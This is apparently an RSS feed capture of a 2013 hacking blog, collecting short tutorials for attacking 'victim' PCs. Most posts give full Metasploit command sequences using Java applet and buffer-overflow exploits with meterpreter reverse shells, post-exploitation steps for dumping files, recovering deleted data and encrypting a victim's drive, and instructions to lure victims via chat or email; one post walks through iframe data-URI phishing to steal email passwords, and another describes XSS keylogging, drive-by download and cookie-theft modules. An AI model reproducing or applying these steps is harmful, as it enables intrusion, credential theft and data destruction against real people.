Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all 1819 articles
Browse latest View live

How to Gather Recent Files Dump of Remote PC

February 21, 2013, 11:29 am
$
0
0
The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open backtrack terminal type msfconsole


Now type use post/windows/gather/dumplinks
msf exploit (dumplinks)>set session 1
msf exploit (dumplinks)>exploit  

Search

Exploit Windows, Linux or MAC PC using Java Applet JMX Remote Code Execution

February 26, 2013, 9:30 am
$
0
0
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Exploit Targets
Java 7 Update 10
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean_2)>exploit 


Now an URL you should give to your victim http://192.168.1.7:8080/


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

OWASP Xenotix XSS Exploit Framework v3 2013

February 27, 2013, 9:19 am
$
0
0
Introduction
Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 3rd Vulnerability in the OWASP 2013 Web application Vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about XSS.

Some threats due to XSS
XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver.
Client side code injection: A hacker can inject malicious codes and execute them at client side.
DOS: A hacker can perform DOS against a remote server or against the client itself.
Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.
Malware Spreading: A hacker can spread malwares with a website which is vulnerable to XSS.
Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.
Defacing: Temporary or permanent defacement of web application is possible.

What is Xenotix XSS Exploit Framework?


Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications.This tool can inject codes into a webpage which are vulnerable to XSS.It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader, a XSS Reverse Shell and a XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.

Features of Xenotix XSS Exploit Framework
Xenotix XSS Exploit Framework is divided into two module

 Scanner Module
  • Built in XSS Payloads
  • HTML5 compactable Payload list
  • XSS Auto mode Scanner
  • XSS Multi-Parameter Scanner
  • XSS Fuzzer
Exploitation Framework
  • XSS Keylogger
  • XSS Executable Drive-by downloader
  • XSS Payload Encoder
  • XSS Reverse Shell
  • XSS DDoSer
  • XSS Cookie Thief
Scanner Module

Built in Payload List
It is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes HTML5 compactable XSS injection payloads.Most of the XSS filters are implemented using String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.


The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. Xenotix XSS Exploit Framework got the world’s second largest XSS Payload list after IBM AppScan Security which is having 700 million payloads.

XSS Scanner Module




XSS Multi-Parameter Scanner


The Multi-Parameter XSS Scanner comes when you have multiple parameters to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don’t need to test each parameter separately.

XSS Fuzzer


The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application.

2. Exploitation Framework
XSS KeyloggerThe XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application. 


The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP.  PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file.




XSS Executable Drive-by Downloader


Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim.




XSS Payload Encoder
The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.

XSS Reverse Shell
A XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application exploited with the injectable scripts generated by XSS Reverse Shell when presented to a victim will initiate the drive by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by.


The advantage of this method is that the reverse shell is downloaded and executed in the victim’s system without his knowledge. But for the execution of reverse shell, it will pop up a UAC dialog requesting for the permission to run the executable. The tool is having an inbuilt Listener that listens to the reverse shell. It is designed in a user friendly manner. All you have to do is to specify the reverse connection IP and port. 



XSS DDoSer



With HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.  WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a bowser behind the scene. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it by abusing CORS, the add-on create numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.






XSS Cookie Thief


It’s the traditional Cookie Stealer but a bit advanced and with real time cookie viewer. This module allows the pentester to create cookie stealing POC.

Features for the Next Build
Current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine Trident. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter and XSS testing by modifying the headers will be included in the next build. XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build.

Conclusion
XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform penetration test on Web Applications against XSS vulnerability and to create POC with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS Scanners or XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner as well as XSS exploitation framework. Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bountyetc. are there. So go for a XSS hunting and grab your bounty.J

About Author
Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He had published different whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest Ethical Hacking Competition. His area of interest includes web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.

Hack Windows PC using Firebird Relational Database CNCT Group Number Buffer Overflow

March 11, 2013, 10:42 pm
$
0
0
This module exploits vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot allows executing the ROP chain which ultimately is used to execute Virtual Alloc and bypass DE

Exploit Targets
Windows FB 2.5.2.26539 (default)
Windows FB 2.5.1.26351
Windows FB 2.1.5.18496

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/misc/fb_cnct_group
msf exploit (fb_cnct_group)>set payload windows/meterpreter/reverse_tcp
msf exploit (fb_cnct_group)>set lhost 192.168.0.102 (IP of Local Host)
msf exploit (fb_cnct_group)>set rhost 192.168.0.111 (This must be an address on the local machine)
msf exploit (fb_cnct_group)>exploit 

How to install Kali linux

March 30, 2013, 4:19 am
$
0
0
First Download Kali linux from here
Boot your pc with Kali Linux once booted, Select Graphical Install


Select your language and click continue.


Select your Location and click continue.


Configure your Keyboard and click continue




Type Your Desired Host name and click continue.


Click continue


Set your root password and click continue.


Configure the Clock and click continue.


Now Click on Guided - Use entire disk and click continue.


Now click continue.


Now Click on All Files in One Partition and click continue.


Now click continue.


Select option yes and click continue


Select option no and click continue


Select option yes and click continue.


Now installation is finished and completed


Log into Kali Linux with the username and password



Instant Penetration Testing: Setting Up a Test Lab How-to

April 4, 2013, 11:55 pm

Hack Windows PC using Java CMM Remote Code Execution

April 5, 2013, 7:57 pm
$
0
0
This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Exploit Targets
Java 7 Update 15
Windows PC

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_cmm
msf exploit (java_cmm)>set payload windows/meterpreter/reverse_tcp
msf exploit (java_cmm)>set lhost 192.168.0.108 (IP of Local Host)
msf exploit (java_cmm)>set srvhost 192.168.0.108 (This must be an address on the local machine)
msf exploit (java_cmm)>set uripath /(The Url to use for this exploit)
msf exploit (java_cmm)>exploit 


Now an URL you should give to your victim http://192.168.0.108:8080


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

April 14, 2013, 9:26 pm
Search

How to Encrypt Drive of Remote Victim PC

April 20, 2013, 4:12 am
$
0
0
First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type manage-bde -status and press Enter.



Run the following command to enable BitLocker on your desired PC drive (in my case g drive), store the recovery key on the c:/windows/systemdrive, and generate a random recovery password

manage-bde -on g:  -RecoveryKey c:/windows/system -RecoveryPassword


Linux Server Hacks

April 20, 2013, 11:56 pm

Hack Email Password using Iframe URI Phishing

April 25, 2013, 11:30 pm
$
0
0
First of all download Super Phisherand create a Phishing page (How to Create Phishing Page)


To get the URL of the phishing page upload the page on any webhost / localhost (XAMPP in my case)


Replace the URL link in the iframe code with the URL of the uploaded phishing page


Now visit http://dopiaza.org/tools/datauri/ , select Provide Text option in URL Generator page and pasting the modified exploit code (as shown above)

Once the code has been pasted in the Text Area , click on Generate Data URL  




We will get the code as shown above after generating the URL.

In the code generated replce “plain” with“html”


Convert the above URL code in short URL by using “www.tinyurl.com”


Now send the converted URL to Victim


As soon the Victim will enter his credentials you will get the same


Reference URL: http://packetstormsecurity.com/files/121389/Iframe-URI-Phishing.html

Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

April 27, 2013, 3:48 am
$
0
0
Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact.

Exploit Targets
FreeFloat FTP Server

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/ftp/freefloatftp_user
msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp
msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)
msf exploit (freefloatftp_user)>exploit  


Hack Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution

April 28, 2013, 12:55 am
$
0
0
This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets
Java 7 Update 17
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_jre17_reflection_types
msf exploit (java_jre17_reflection_types)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (java_jre17_reflection_types)>set target 1
msf exploit (java_jre17_reflection_types)>set srvhost 192.168.0.106 (This must be an address on the local
msf exploit (java_jre17_reflection_types)>set payload windows/meterpreter/reverse_tcp
machine)
msf exploit (java_jre17_reflection_types)>exploit


Now an URL you should give to your victim http://192.168.1.0.106:8080/Mt7fUKs955I

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.



Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Windows Forensics Analysis Toolkit

April 30, 2013, 8:01 am

CutyCapt - A Qt WebKit Web Page Rendering Capture Utility

May 3, 2013, 12:28 am
$
0
0
CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP

First download the cutycapt from here

Open your cutycapt from command prompt and type following command

CutyCapt –url=http://www.example.com –out=anyfile.pdf (Convert in PDF Format)

CutyCapt –url=http://www.example.com –out=anyfile.jpg (Convert in Image File)


In Kali Linux

Open your kali linux terminal and type

CutyCapt –url=http://www.example.com –out=anyfile.pdf (To Convert in PDF Format)

CutyCapt –url=http://www.example.com –out=anyfile.jpg (To Convert in Image File)

Search

iOS Hacker's Handbook

May 3, 2013, 12:47 am

Hack Windows PC using AudioCoder .M3U Buffer Overflow

May 7, 2013, 5:04 am
$
0
0

This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets
Audio Code 0.8.18

Requirement
Metasploit

Open your metasploit terminal


Now type use exploit/windows/fileformat/audio_coder_m3u
msf exploit (audio_coder_m3u)>set payload windows/meterpreter/reverse_tcp
msf exploit (audio_coder_m3u)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (audio_coder_m3u)>exploit


After we successfully generate the malicious p2g File, it will stored on your local computer
C:/Users/User/.msf4/local/msf.m3u


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.





Exploit Remote PC using ERS Viewer 2011 ERS File Handling Buffer Overflow

May 10, 2013, 1:17 am
$
0
0
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the functionERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
ERS Viewer 2011 (v11.04)

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/erdas_er_viewer_bof
msf exploit (erdas_er_viewer_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_bof)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (erdas_er_viewer_bof)>exploit  


After we successfully generate the malicious ers File, it will stored on your local computer
/root/.msf4/local/msf.ers


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
exploit
Now send your msf.ers files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hacking and Securing iOS Applications

May 18, 2013, 4:25 am

Recover Deleted Data from Remote Victim PC

May 23, 2013, 5:08 am
$
0
0
This module list and try to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Let it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. "pdf") to recover deleted files with that extension. Or set FILES to a comma separated list of IDs (from enumeration) to recover those files. The user must have into account file enumeration and recovery could take a long time, use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).

Exploit Targets
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open your backtrack terminal and type msfconsole


Run the following command to list all the drives of victim PC

Now type use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit  


Run the following command to recover the deleted data of the Victim PC
(I am using H: drive in my case)

Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive h:
msf exploit (recovery_files)>exploit   


Run the following command to save the deleted dataon /root/.msf4/loot
Set files 1073777664,1073778688,1073779212


Viewing all 1819 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>